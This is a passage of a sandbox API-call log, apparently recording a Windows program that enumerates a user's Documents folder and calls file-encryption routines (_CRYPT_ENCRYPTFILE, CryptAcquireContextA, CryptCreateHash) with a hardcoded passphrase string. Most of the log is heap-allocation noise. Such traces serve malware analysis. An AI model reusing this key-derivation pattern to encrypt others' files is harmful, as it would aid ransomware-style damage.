lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.529] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.529] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.529] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369bb8 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.532] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.532] CloseHandle (hObject=0x258) returned 1 [0076.532] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.532] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.532] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac140 [0076.533] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0076.533] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.533] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0076.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0076.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0076.533] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0076.534] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.534] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.534] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.534] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.534] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.534] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.535] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca5c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0076.535] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0076.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.535] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2788 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2728 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2ae8 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b18 [0076.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2ae8 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0076.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0076.537] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.539] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.539] RtlAllocateHeap 